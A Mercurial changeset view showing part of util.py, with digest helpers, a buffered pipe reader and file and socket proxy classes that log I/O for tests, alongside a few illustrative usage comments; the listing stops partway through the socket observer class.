py3: cast attribute name to sysstr in clearcachedproperty()
Yuya Nishihara
r40725:475921a3 default
@@ -1,3986 +1,3987 @@
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import bz2
20 20 import collections
21 21 import contextlib
22 22 import errno
23 23 import gc
24 24 import hashlib
25 25 import itertools
26 26 import mmap
27 27 import os
28 28 import platform as pyplatform
29 29 import re as remod
30 30 import shutil
31 31 import socket
32 32 import stat
33 33 import sys
34 34 import time
35 35 import traceback
36 36 import warnings
37 37 import zlib
38 38
39 39 from .thirdparty import (
40 40 attr,
41 41 )
42 42 from hgdemandimport import tracing
43 43 from . import (
44 44 encoding,
45 45 error,
46 46 i18n,
47 47 node as nodemod,
48 48 policy,
49 49 pycompat,
50 50 urllibcompat,
51 51 )
52 52 from .utils import (
53 53 procutil,
54 54 stringutil,
55 55 )
56 56
57 57 base85 = policy.importmod(r'base85')
58 58 osutil = policy.importmod(r'osutil')
59 59 parsers = policy.importmod(r'parsers')
60 60
61 61 b85decode = base85.b85decode
62 62 b85encode = base85.b85encode
63 63
64 64 cookielib = pycompat.cookielib
65 65 httplib = pycompat.httplib
66 66 pickle = pycompat.pickle
67 67 safehasattr = pycompat.safehasattr
68 68 socketserver = pycompat.socketserver
69 69 bytesio = pycompat.bytesio
70 70 # TODO deprecate stringio name, as it is a lie on Python 3.
71 71 stringio = bytesio
72 72 xmlrpclib = pycompat.xmlrpclib
73 73
74 74 httpserver = urllibcompat.httpserver
75 75 urlerr = urllibcompat.urlerr
76 76 urlreq = urllibcompat.urlreq
77 77
78 78 # workaround for win32mbcs
79 79 _filenamebytestr = pycompat.bytestr
80 80
81 81 if pycompat.iswindows:
82 82 from . import windows as platform
83 83 else:
84 84 from . import posix as platform
85 85
86 86 _ = i18n._
87 87
88 88 bindunixsocket = platform.bindunixsocket
89 89 cachestat = platform.cachestat
90 90 checkexec = platform.checkexec
91 91 checklink = platform.checklink
92 92 copymode = platform.copymode
93 93 expandglobs = platform.expandglobs
94 94 getfsmountpoint = platform.getfsmountpoint
95 95 getfstype = platform.getfstype
96 96 groupmembers = platform.groupmembers
97 97 groupname = platform.groupname
98 98 isexec = platform.isexec
99 99 isowner = platform.isowner
100 100 listdir = osutil.listdir
101 101 localpath = platform.localpath
102 102 lookupreg = platform.lookupreg
103 103 makedir = platform.makedir
104 104 nlinks = platform.nlinks
105 105 normpath = platform.normpath
106 106 normcase = platform.normcase
107 107 normcasespec = platform.normcasespec
108 108 normcasefallback = platform.normcasefallback
109 109 openhardlinks = platform.openhardlinks
110 110 oslink = platform.oslink
111 111 parsepatchoutput = platform.parsepatchoutput
112 112 pconvert = platform.pconvert
113 113 poll = platform.poll
114 114 posixfile = platform.posixfile
115 115 readlink = platform.readlink
116 116 rename = platform.rename
117 117 removedirs = platform.removedirs
118 118 samedevice = platform.samedevice
119 119 samefile = platform.samefile
120 120 samestat = platform.samestat
121 121 setflags = platform.setflags
122 122 split = platform.split
123 123 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
124 124 statisexec = platform.statisexec
125 125 statislink = platform.statislink
126 126 umask = platform.umask
127 127 unlink = platform.unlink
128 128 username = platform.username
129 129
130 130 try:
131 131 recvfds = osutil.recvfds
132 132 except AttributeError:
133 133 pass
134 134
135 135 # Python compatibility
136 136
137 137 _notset = object()
138 138
139 139 def bitsfrom(container):
140 140 bits = 0
141 141 for bit in container:
142 142 bits |= bit
143 143 return bits
144 144
145 145 # python 2.6 still has deprecation warnings enabled by default. We do not
146 146 # want to display anything to standard users, so detect if we are running
147 147 # tests and only use python deprecation warnings in this case.
148 148 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
149 149 if _dowarn:
150 150 # explicitly unfilter our warning for python 2.7
151 151 #
152 152 # The option of setting PYTHONWARNINGS in the test runner was investigated.
153 153 # However, the module name set through PYTHONWARNINGS is matched exactly, so
154 154 # we cannot set 'mercurial' and have it match e.g. 'mercurial.scmutil'. This
155 155 # makes the whole PYTHONWARNINGS approach useless for our use case.
156 156 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
157 157 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
158 158 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
159 159 if _dowarn and pycompat.ispy3:
160 160 # silence warning emitted by passing user string to re.sub()
161 161 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
162 162 r'mercurial')
163 163 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
164 164 DeprecationWarning, r'mercurial')
165 165 # TODO: reinvent imp.is_frozen()
166 166 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
167 167 DeprecationWarning, r'mercurial')
168 168
169 169 def nouideprecwarn(msg, version, stacklevel=1):
170 170 """Issue an python native deprecation warning
171 171
172 172 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
173 173 """
174 174 if _dowarn:
175 175 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
176 176 " update your code.)") % version
177 177 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
178 178
179 179 DIGESTS = {
180 180 'md5': hashlib.md5,
181 181 'sha1': hashlib.sha1,
182 182 'sha512': hashlib.sha512,
183 183 }
184 184 # List of digest types from strongest to weakest
185 185 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
186 186
187 187 for k in DIGESTS_BY_STRENGTH:
188 188 assert k in DIGESTS
189 189
190 190 class digester(object):
191 191 """helper to compute digests.
192 192
193 193 This helper can be used to compute one or more digests given their name.
194 194
195 195 >>> d = digester([b'md5', b'sha1'])
196 196 >>> d.update(b'foo')
197 197 >>> [k for k in sorted(d)]
198 198 ['md5', 'sha1']
199 199 >>> d[b'md5']
200 200 'acbd18db4cc2f85cedef654fccc4a4d8'
201 201 >>> d[b'sha1']
202 202 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
203 203 >>> digester.preferred([b'md5', b'sha1'])
204 204 'sha1'
205 205 """
206 206
207 207 def __init__(self, digests, s=''):
208 208 self._hashes = {}
209 209 for k in digests:
210 210 if k not in DIGESTS:
211 211 raise error.Abort(_('unknown digest type: %s') % k)
212 212 self._hashes[k] = DIGESTS[k]()
213 213 if s:
214 214 self.update(s)
215 215
216 216 def update(self, data):
217 217 for h in self._hashes.values():
218 218 h.update(data)
219 219
220 220 def __getitem__(self, key):
221 221 if key not in DIGESTS:
222 222 raise error.Abort(_('unknown digest type: %s') % key)
223 223 return nodemod.hex(self._hashes[key].digest())
224 224
225 225 def __iter__(self):
226 226 return iter(self._hashes)
227 227
228 228 @staticmethod
229 229 def preferred(supported):
230 230 """returns the strongest digest type in both supported and DIGESTS."""
231 231
232 232 for k in DIGESTS_BY_STRENGTH:
233 233 if k in supported:
234 234 return k
235 235 return None
236 236
237 237 class digestchecker(object):
238 238 """file handle wrapper that additionally checks content against a given
239 239 size and digests.
240 240
241 241 d = digestchecker(fh, size, {'md5': '...'})
242 242
243 243 When multiple digests are given, all of them are validated.
244 244 """
245 245
246 246 def __init__(self, fh, size, digests):
247 247 self._fh = fh
248 248 self._size = size
249 249 self._got = 0
250 250 self._digests = dict(digests)
251 251 self._digester = digester(self._digests.keys())
252 252
253 253 def read(self, length=-1):
254 254 content = self._fh.read(length)
255 255 self._digester.update(content)
256 256 self._got += len(content)
257 257 return content
258 258
259 259 def validate(self):
260 260 if self._size != self._got:
261 261 raise error.Abort(_('size mismatch: expected %d, got %d') %
262 262 (self._size, self._got))
263 263 for k, v in self._digests.items():
264 264 if v != self._digester[k]:
265 265 # i18n: first parameter is a digest name
266 266 raise error.Abort(_('%s mismatch: expected %s, got %s') %
267 267 (k, v, self._digester[k]))
268 268
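# Usage sketch (illustrative, not part of util.py): wrap a file object whose
# expected size and digest are known up front, then validate after consuming
# it. 'fh', 'expectedsize' and 'expectedmd5' are hypothetical names.
#
#   d = digestchecker(fh, expectedsize, {'md5': expectedmd5})
#   while d.read(4096):
#       pass
#   d.validate()   # raises error.Abort on a size or digest mismatch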
269 269 try:
270 270 buffer = buffer
271 271 except NameError:
272 272 def buffer(sliceable, offset=0, length=None):
273 273 if length is not None:
274 274 return memoryview(sliceable)[offset:offset + length]
275 275 return memoryview(sliceable)[offset:]
276 276
277 277 _chunksize = 4096
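# Example (illustrative): on Python 3 the fallback above returns a
# memoryview, so slicing a large bytes object does not copy its data.
#
#   data = b'0123456789'
#   view = buffer(data, 2, 4)
#   bytes(view) == b'2345'   # True, with no intermediate copy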
278 278
279 279 class bufferedinputpipe(object):
280 280 """a manually buffered input pipe
281 281
282 282 Python will not let us use buffered IO and lazy reading with 'polling' at
283 283 the same time. We cannot probe the buffer state and select will not detect
284 284 that data are ready to read if they are already buffered.
285 285
286 286 This class lets us work around that by implementing its own buffering
287 287 (allowing efficient readline) while offering a way to know if the buffer is
288 288 empty from the output (allowing collaboration of the buffer with polling).
289 289
290 290 This class lives in the 'util' module because it makes use of the 'os'
291 291 module from the python stdlib.
292 292 """
293 293 def __new__(cls, fh):
294 294 # If we receive a fileobjectproxy, we need to use a variation of this
295 295 # class that notifies observers about activity.
296 296 if isinstance(fh, fileobjectproxy):
297 297 cls = observedbufferedinputpipe
298 298
299 299 return super(bufferedinputpipe, cls).__new__(cls)
300 300
301 301 def __init__(self, input):
302 302 self._input = input
303 303 self._buffer = []
304 304 self._eof = False
305 305 self._lenbuf = 0
306 306
307 307 @property
308 308 def hasbuffer(self):
309 309 """True is any data is currently buffered
310 310
311 311 This will be used externally a pre-step for polling IO. If there is
312 312 already data then no polling should be set in place."""
313 313 return bool(self._buffer)
314 314
315 315 @property
316 316 def closed(self):
317 317 return self._input.closed
318 318
319 319 def fileno(self):
320 320 return self._input.fileno()
321 321
322 322 def close(self):
323 323 return self._input.close()
324 324
325 325 def read(self, size):
326 326 while (not self._eof) and (self._lenbuf < size):
327 327 self._fillbuffer()
328 328 return self._frombuffer(size)
329 329
330 330 def unbufferedread(self, size):
331 331 if not self._eof and self._lenbuf == 0:
332 332 self._fillbuffer(max(size, _chunksize))
333 333 return self._frombuffer(min(self._lenbuf, size))
334 334
335 335 def readline(self, *args, **kwargs):
336 336 if len(self._buffer) > 1:
337 337 # this should not happen because both read and readline end with a
338 338 # _frombuffer call that collapses it.
339 339 self._buffer = [''.join(self._buffer)]
340 340 self._lenbuf = len(self._buffer[0])
341 341 lfi = -1
342 342 if self._buffer:
343 343 lfi = self._buffer[-1].find('\n')
344 344 while (not self._eof) and lfi < 0:
345 345 self._fillbuffer()
346 346 if self._buffer:
347 347 lfi = self._buffer[-1].find('\n')
348 348 size = lfi + 1
349 349 if lfi < 0: # end of file
350 350 size = self._lenbuf
351 351 elif len(self._buffer) > 1:
352 352 # we need to take previous chunks into account
353 353 size += self._lenbuf - len(self._buffer[-1])
354 354 return self._frombuffer(size)
355 355
356 356 def _frombuffer(self, size):
357 357 """return at most 'size' data from the buffer
358 358
359 359 The data are removed from the buffer."""
360 360 if size == 0 or not self._buffer:
361 361 return ''
362 362 buf = self._buffer[0]
363 363 if len(self._buffer) > 1:
364 364 buf = ''.join(self._buffer)
365 365
366 366 data = buf[:size]
367 367 buf = buf[len(data):]
368 368 if buf:
369 369 self._buffer = [buf]
370 370 self._lenbuf = len(buf)
371 371 else:
372 372 self._buffer = []
373 373 self._lenbuf = 0
374 374 return data
375 375
376 376 def _fillbuffer(self, size=_chunksize):
377 377 """read data to the buffer"""
378 378 data = os.read(self._input.fileno(), size)
379 379 if not data:
380 380 self._eof = True
381 381 else:
382 382 self._lenbuf += len(data)
383 383 self._buffer.append(data)
384 384
385 385 return data
386 386
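# Usage sketch (illustrative): wrap the read end of a pipe so readline() is
# efficient while 'hasbuffer' remains usable together with select(). 'proc'
# is a hypothetical subprocess.Popen(..., stdout=subprocess.PIPE) handle.
#
#   pipe = bufferedinputpipe(proc.stdout)
#   if not pipe.hasbuffer:
#       select.select([pipe], [], [])   # safe: no data hidden in a buffer
#   line = pipe.readline()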
387 387 def mmapread(fp):
388 388 try:
389 389 fd = getattr(fp, 'fileno', lambda: fp)()
390 390 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
391 391 except ValueError:
392 392 # Empty files cannot be mmapped, but mmapread should still work. Check
393 393 # if the file is empty, and if so, return an empty buffer.
394 394 if os.fstat(fd).st_size == 0:
395 395 return ''
396 396 raise
397 397
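# Usage sketch (illustrative): map a file for zero-copy random access.
# 'path' is a hypothetical filename.
#
#   with open(path, 'rb') as fp:
#       data = mmapread(fp)   # an mmap object, or '' for an empty file
#   header = data[:4]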
398 398 class fileobjectproxy(object):
399 399 """A proxy around file objects that tells a watcher when events occur.
400 400
401 401 This type is intended to only be used for testing purposes. Think hard
402 402 before using it in important code.
403 403 """
404 404 __slots__ = (
405 405 r'_orig',
406 406 r'_observer',
407 407 )
408 408
409 409 def __init__(self, fh, observer):
410 410 object.__setattr__(self, r'_orig', fh)
411 411 object.__setattr__(self, r'_observer', observer)
412 412
413 413 def __getattribute__(self, name):
414 414 ours = {
415 415 r'_observer',
416 416
417 417 # IOBase
418 418 r'close',
419 419 # closed is a property
420 420 r'fileno',
421 421 r'flush',
422 422 r'isatty',
423 423 r'readable',
424 424 r'readline',
425 425 r'readlines',
426 426 r'seek',
427 427 r'seekable',
428 428 r'tell',
429 429 r'truncate',
430 430 r'writable',
431 431 r'writelines',
432 432 # RawIOBase
433 433 r'read',
434 434 r'readall',
435 435 r'readinto',
436 436 r'write',
437 437 # BufferedIOBase
438 438 # raw is a property
439 439 r'detach',
440 440 # read defined above
441 441 r'read1',
442 442 # readinto defined above
443 443 # write defined above
444 444 }
445 445
446 446 # We only observe some methods.
447 447 if name in ours:
448 448 return object.__getattribute__(self, name)
449 449
450 450 return getattr(object.__getattribute__(self, r'_orig'), name)
451 451
452 452 def __nonzero__(self):
453 453 return bool(object.__getattribute__(self, r'_orig'))
454 454
455 455 __bool__ = __nonzero__
456 456
457 457 def __delattr__(self, name):
458 458 return delattr(object.__getattribute__(self, r'_orig'), name)
459 459
460 460 def __setattr__(self, name, value):
461 461 return setattr(object.__getattribute__(self, r'_orig'), name, value)
462 462
463 463 def __iter__(self):
464 464 return object.__getattribute__(self, r'_orig').__iter__()
465 465
466 466 def _observedcall(self, name, *args, **kwargs):
467 467 # Call the original object.
468 468 orig = object.__getattribute__(self, r'_orig')
469 469 res = getattr(orig, name)(*args, **kwargs)
470 470
471 471 # Call a method on the observer of the same name with arguments
472 472 # so it can react, log, etc.
473 473 observer = object.__getattribute__(self, r'_observer')
474 474 fn = getattr(observer, name, None)
475 475 if fn:
476 476 fn(res, *args, **kwargs)
477 477
478 478 return res
479 479
480 480 def close(self, *args, **kwargs):
481 481 return object.__getattribute__(self, r'_observedcall')(
482 482 r'close', *args, **kwargs)
483 483
484 484 def fileno(self, *args, **kwargs):
485 485 return object.__getattribute__(self, r'_observedcall')(
486 486 r'fileno', *args, **kwargs)
487 487
488 488 def flush(self, *args, **kwargs):
489 489 return object.__getattribute__(self, r'_observedcall')(
490 490 r'flush', *args, **kwargs)
491 491
492 492 def isatty(self, *args, **kwargs):
493 493 return object.__getattribute__(self, r'_observedcall')(
494 494 r'isatty', *args, **kwargs)
495 495
496 496 def readable(self, *args, **kwargs):
497 497 return object.__getattribute__(self, r'_observedcall')(
498 498 r'readable', *args, **kwargs)
499 499
500 500 def readline(self, *args, **kwargs):
501 501 return object.__getattribute__(self, r'_observedcall')(
502 502 r'readline', *args, **kwargs)
503 503
504 504 def readlines(self, *args, **kwargs):
505 505 return object.__getattribute__(self, r'_observedcall')(
506 506 r'readlines', *args, **kwargs)
507 507
508 508 def seek(self, *args, **kwargs):
509 509 return object.__getattribute__(self, r'_observedcall')(
510 510 r'seek', *args, **kwargs)
511 511
512 512 def seekable(self, *args, **kwargs):
513 513 return object.__getattribute__(self, r'_observedcall')(
514 514 r'seekable', *args, **kwargs)
515 515
516 516 def tell(self, *args, **kwargs):
517 517 return object.__getattribute__(self, r'_observedcall')(
518 518 r'tell', *args, **kwargs)
519 519
520 520 def truncate(self, *args, **kwargs):
521 521 return object.__getattribute__(self, r'_observedcall')(
522 522 r'truncate', *args, **kwargs)
523 523
524 524 def writable(self, *args, **kwargs):
525 525 return object.__getattribute__(self, r'_observedcall')(
526 526 r'writable', *args, **kwargs)
527 527
528 528 def writelines(self, *args, **kwargs):
529 529 return object.__getattribute__(self, r'_observedcall')(
530 530 r'writelines', *args, **kwargs)
531 531
532 532 def read(self, *args, **kwargs):
533 533 return object.__getattribute__(self, r'_observedcall')(
534 534 r'read', *args, **kwargs)
535 535
536 536 def readall(self, *args, **kwargs):
537 537 return object.__getattribute__(self, r'_observedcall')(
538 538 r'readall', *args, **kwargs)
539 539
540 540 def readinto(self, *args, **kwargs):
541 541 return object.__getattribute__(self, r'_observedcall')(
542 542 r'readinto', *args, **kwargs)
543 543
544 544 def write(self, *args, **kwargs):
545 545 return object.__getattribute__(self, r'_observedcall')(
546 546 r'write', *args, **kwargs)
547 547
548 548 def detach(self, *args, **kwargs):
549 549 return object.__getattribute__(self, r'_observedcall')(
550 550 r'detach', *args, **kwargs)
551 551
552 552 def read1(self, *args, **kwargs):
553 553 return object.__getattribute__(self, r'_observedcall')(
554 554 r'read1', *args, **kwargs)
555 555
556 556 class observedbufferedinputpipe(bufferedinputpipe):
557 557 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
558 558
559 559 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
560 560 bypass ``fileobjectproxy``. Because of this, we need to make
561 561 ``bufferedinputpipe`` aware of these operations.
562 562
563 563 This variation of ``bufferedinputpipe`` can notify observers about
564 564 ``os.read()`` events. It also re-publishes other events, such as
565 565 ``read()`` and ``readline()``.
566 566 """
567 567 def _fillbuffer(self):
568 568 res = super(observedbufferedinputpipe, self)._fillbuffer()
569 569
570 570 fn = getattr(self._input._observer, r'osread', None)
571 571 if fn:
572 572 fn(res, _chunksize)
573 573
574 574 return res
575 575
576 576 # We use different observer methods because the operation isn't
577 577 # performed on the actual file object but on us.
578 578 def read(self, size):
579 579 res = super(observedbufferedinputpipe, self).read(size)
580 580
581 581 fn = getattr(self._input._observer, r'bufferedread', None)
582 582 if fn:
583 583 fn(res, size)
584 584
585 585 return res
586 586
587 587 def readline(self, *args, **kwargs):
588 588 res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
589 589
590 590 fn = getattr(self._input._observer, r'bufferedreadline', None)
591 591 if fn:
592 592 fn(res)
593 593
594 594 return res
595 595
596 596 PROXIED_SOCKET_METHODS = {
597 597 r'makefile',
598 598 r'recv',
599 599 r'recvfrom',
600 600 r'recvfrom_into',
601 601 r'recv_into',
602 602 r'send',
603 603 r'sendall',
604 604 r'sendto',
605 605 r'setblocking',
606 606 r'settimeout',
607 607 r'gettimeout',
608 608 r'setsockopt',
609 609 }
610 610
611 611 class socketproxy(object):
612 612 """A proxy around a socket that tells a watcher when events occur.
613 613
614 614 This is like ``fileobjectproxy`` except for sockets.
615 615
616 616 This type is intended to only be used for testing purposes. Think hard
617 617 before using it in important code.
618 618 """
619 619 __slots__ = (
620 620 r'_orig',
621 621 r'_observer',
622 622 )
623 623
624 624 def __init__(self, sock, observer):
625 625 object.__setattr__(self, r'_orig', sock)
626 626 object.__setattr__(self, r'_observer', observer)
627 627
628 628 def __getattribute__(self, name):
629 629 if name in PROXIED_SOCKET_METHODS:
630 630 return object.__getattribute__(self, name)
631 631
632 632 return getattr(object.__getattribute__(self, r'_orig'), name)
633 633
634 634 def __delattr__(self, name):
635 635 return delattr(object.__getattribute__(self, r'_orig'), name)
636 636
637 637 def __setattr__(self, name, value):
638 638 return setattr(object.__getattribute__(self, r'_orig'), name, value)
639 639
640 640 def __nonzero__(self):
641 641 return bool(object.__getattribute__(self, r'_orig'))
642 642
643 643 __bool__ = __nonzero__
644 644
645 645 def _observedcall(self, name, *args, **kwargs):
646 646 # Call the original object.
647 647 orig = object.__getattribute__(self, r'_orig')
648 648 res = getattr(orig, name)(*args, **kwargs)
649 649
650 650 # Call a method on the observer of the same name with arguments
651 651 # so it can react, log, etc.
652 652 observer = object.__getattribute__(self, r'_observer')
653 653 fn = getattr(observer, name, None)
654 654 if fn:
655 655 fn(res, *args, **kwargs)
656 656
657 657 return res
658 658
659 659 def makefile(self, *args, **kwargs):
660 660 res = object.__getattribute__(self, r'_observedcall')(
661 661 r'makefile', *args, **kwargs)
662 662
663 663 # The file object may be used for I/O. So we turn it into a
664 664 # proxy using our observer.
665 665 observer = object.__getattribute__(self, r'_observer')
666 666 return makeloggingfileobject(observer.fh, res, observer.name,
667 667 reads=observer.reads,
668 668 writes=observer.writes,
669 669 logdata=observer.logdata,
670 670 logdataapis=observer.logdataapis)
671 671
672 672 def recv(self, *args, **kwargs):
673 673 return object.__getattribute__(self, r'_observedcall')(
674 674 r'recv', *args, **kwargs)
675 675
676 676 def recvfrom(self, *args, **kwargs):
677 677 return object.__getattribute__(self, r'_observedcall')(
678 678 r'recvfrom', *args, **kwargs)
679 679
680 680 def recvfrom_into(self, *args, **kwargs):
681 681 return object.__getattribute__(self, r'_observedcall')(
682 682 r'recvfrom_into', *args, **kwargs)
683 683
684 684 def recv_into(self, *args, **kwargs):
685 685 return object.__getattribute__(self, r'_observedcall')(
686 686 r'recv_into', *args, **kwargs)
687 687
688 688 def send(self, *args, **kwargs):
689 689 return object.__getattribute__(self, r'_observedcall')(
690 690 r'send', *args, **kwargs)
691 691
692 692 def sendall(self, *args, **kwargs):
693 693 return object.__getattribute__(self, r'_observedcall')(
694 694 r'sendall', *args, **kwargs)
695 695
696 696 def sendto(self, *args, **kwargs):
697 697 return object.__getattribute__(self, r'_observedcall')(
698 698 r'sendto', *args, **kwargs)
699 699
700 700 def setblocking(self, *args, **kwargs):
701 701 return object.__getattribute__(self, r'_observedcall')(
702 702 r'setblocking', *args, **kwargs)
703 703
704 704 def settimeout(self, *args, **kwargs):
705 705 return object.__getattribute__(self, r'_observedcall')(
706 706 r'settimeout', *args, **kwargs)
707 707
708 708 def gettimeout(self, *args, **kwargs):
709 709 return object.__getattribute__(self, r'_observedcall')(
710 710 r'gettimeout', *args, **kwargs)
711 711
712 712 def setsockopt(self, *args, **kwargs):
713 713 return object.__getattribute__(self, r'_observedcall')(
714 714 r'setsockopt', *args, **kwargs)
715 715
716 716 class baseproxyobserver(object):
717 717 def _writedata(self, data):
718 718 if not self.logdata:
719 719 if self.logdataapis:
720 720 self.fh.write('\n')
721 721 self.fh.flush()
722 722 return
723 723
724 724 # Simple case writes all data on a single line.
725 725 if b'\n' not in data:
726 726 if self.logdataapis:
727 727 self.fh.write(': %s\n' % stringutil.escapestr(data))
728 728 else:
729 729 self.fh.write('%s> %s\n'
730 730 % (self.name, stringutil.escapestr(data)))
731 731 self.fh.flush()
732 732 return
733 733
734 734 # Data with newlines is written to multiple lines.
735 735 if self.logdataapis:
736 736 self.fh.write(':\n')
737 737
738 738 lines = data.splitlines(True)
739 739 for line in lines:
740 740 self.fh.write('%s> %s\n'
741 741 % (self.name, stringutil.escapestr(line)))
742 742 self.fh.flush()
743 743
744 744 class fileobjectobserver(baseproxyobserver):
745 745 """Logs file object activity."""
746 746 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
747 747 logdataapis=True):
748 748 self.fh = fh
749 749 self.name = name
750 750 self.logdata = logdata
751 751 self.logdataapis = logdataapis
752 752 self.reads = reads
753 753 self.writes = writes
754 754
755 755 def read(self, res, size=-1):
756 756 if not self.reads:
757 757 return
758 758 # Python 3 can return None from reads at EOF instead of empty strings.
759 759 if res is None:
760 760 res = ''
761 761
762 762 if size == -1 and res == '':
763 763 # Suppress pointless read(-1) calls that return
764 764 # nothing. These happen _a lot_ on Python 3, and there
765 765 # doesn't seem to be a better workaround to have matching
766 766 # Python 2 and 3 behavior. :(
767 767 return
768 768
769 769 if self.logdataapis:
770 770 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
771 771
772 772 self._writedata(res)
773 773
774 774 def readline(self, res, limit=-1):
775 775 if not self.reads:
776 776 return
777 777
778 778 if self.logdataapis:
779 779 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
780 780
781 781 self._writedata(res)
782 782
783 783 def readinto(self, res, dest):
784 784 if not self.reads:
785 785 return
786 786
787 787 if self.logdataapis:
788 788 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
789 789 res))
790 790
791 791 data = dest[0:res] if res is not None else b''
792 792 self._writedata(data)
793 793
794 794 def write(self, res, data):
795 795 if not self.writes:
796 796 return
797 797
798 798 # Python 2 returns None from some write() calls. Python 3 (reasonably)
799 799 # returns the integer bytes written.
800 800 if res is None and data:
801 801 res = len(data)
802 802
803 803 if self.logdataapis:
804 804 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
805 805
806 806 self._writedata(data)
807 807
808 808 def flush(self, res):
809 809 if not self.writes:
810 810 return
811 811
812 812 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
813 813
814 814 # For observedbufferedinputpipe.
815 815 def bufferedread(self, res, size):
816 816 if not self.reads:
817 817 return
818 818
819 819 if self.logdataapis:
820 820 self.fh.write('%s> bufferedread(%d) -> %d' % (
821 821 self.name, size, len(res)))
822 822
823 823 self._writedata(res)
824 824
825 825 def bufferedreadline(self, res):
826 826 if not self.reads:
827 827 return
828 828
829 829 if self.logdataapis:
830 830 self.fh.write('%s> bufferedreadline() -> %d' % (
831 831 self.name, len(res)))
832 832
833 833 self._writedata(res)
834 834
835 835 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
836 836 logdata=False, logdataapis=True):
837 837 """Turn a file object into a logging file object."""
838 838
839 839 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
840 840 logdata=logdata, logdataapis=logdataapis)
841 841 return fileobjectproxy(fh, observer)
842 842
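# Usage sketch (illustrative): mirror every read/write on a file object to a
# log handle. 'logfh' and 'fh' are hypothetical open file objects.
#
#   proxy = makeloggingfileobject(logfh, fh, b'myfile', logdata=True)
#   proxy.write(b'hello')
#   # logfh receives something like: "myfile> write(5) -> 5: hello"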
843 843 class socketobserver(baseproxyobserver):
844 844 """Logs socket activity."""
845 845 def __init__(self, fh, name, reads=True, writes=True, states=True,
846 846 logdata=False, logdataapis=True):
847 847 self.fh = fh
848 848 self.name = name
849 849 self.reads = reads
850 850 self.writes = writes
851 851 self.states = states
852 852 self.logdata = logdata
853 853 self.logdataapis = logdataapis
854 854
855 855 def makefile(self, res, mode=None, bufsize=None):
856 856 if not self.states:
857 857 return
858 858
859 859 self.fh.write('%s> makefile(%r, %r)\n' % (
860 860 self.name, mode, bufsize))
861 861
862 862 def recv(self, res, size, flags=0):
863 863 if not self.reads:
864 864 return
865 865
866 866 if self.logdataapis:
867 867 self.fh.write('%s> recv(%d, %d) -> %d' % (
868 868 self.name, size, flags, len(res)))
869 869 self._writedata(res)
870 870
871 871 def recvfrom(self, res, size, flags=0):
872 872 if not self.reads:
873 873 return
874 874
875 875 if self.logdataapis:
876 876 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
877 877 self.name, size, flags, len(res[0])))
878 878
879 879 self._writedata(res[0])
880 880
881 881 def recvfrom_into(self, res, buf, size, flags=0):
882 882 if not self.reads:
883 883 return
884 884
885 885 if self.logdataapis:
886 886 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
887 887 self.name, size, flags, res[0]))
888 888
889 889 self._writedata(buf[0:res[0]])
890 890
891 891 def recv_into(self, res, buf, size=0, flags=0):
892 892 if not self.reads:
893 893 return
894 894
895 895 if self.logdataapis:
896 896 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
897 897 self.name, size, flags, res))
898 898
899 899 self._writedata(buf[0:res])
900 900
901 901 def send(self, res, data, flags=0):
902 902 if not self.writes:
903 903 return
904 904
905 905 self.fh.write('%s> send(%d, %d) -> %d' % (
906 906 self.name, len(data), flags, len(res)))
907 907 self._writedata(data)
908 908
909 909 def sendall(self, res, data, flags=0):
910 910 if not self.writes:
911 911 return
912 912
913 913 if self.logdataapis:
914 914 # Returns None on success. So don't bother reporting return value.
915 915 self.fh.write('%s> sendall(%d, %d)' % (
916 916 self.name, len(data), flags))
917 917
918 918 self._writedata(data)
919 919
920 920 def sendto(self, res, data, flagsoraddress, address=None):
921 921 if not self.writes:
922 922 return
923 923
924 924 if address:
925 925 flags = flagsoraddress
926 926 else:
927 927 flags = 0
928 928
929 929 if self.logdataapis:
930 930 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
931 931 self.name, len(data), flags, address, res))
932 932
933 933 self._writedata(data)
934 934
935 935 def setblocking(self, res, flag):
936 936 if not self.states:
937 937 return
938 938
939 939 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
940 940
941 941 def settimeout(self, res, value):
942 942 if not self.states:
943 943 return
944 944
945 945 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
946 946
947 947 def gettimeout(self, res):
948 948 if not self.states:
949 949 return
950 950
951 951 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
952 952
953 953 def setsockopt(self, res, level, optname, value):
954 954 if not self.states:
955 955 return
956 956
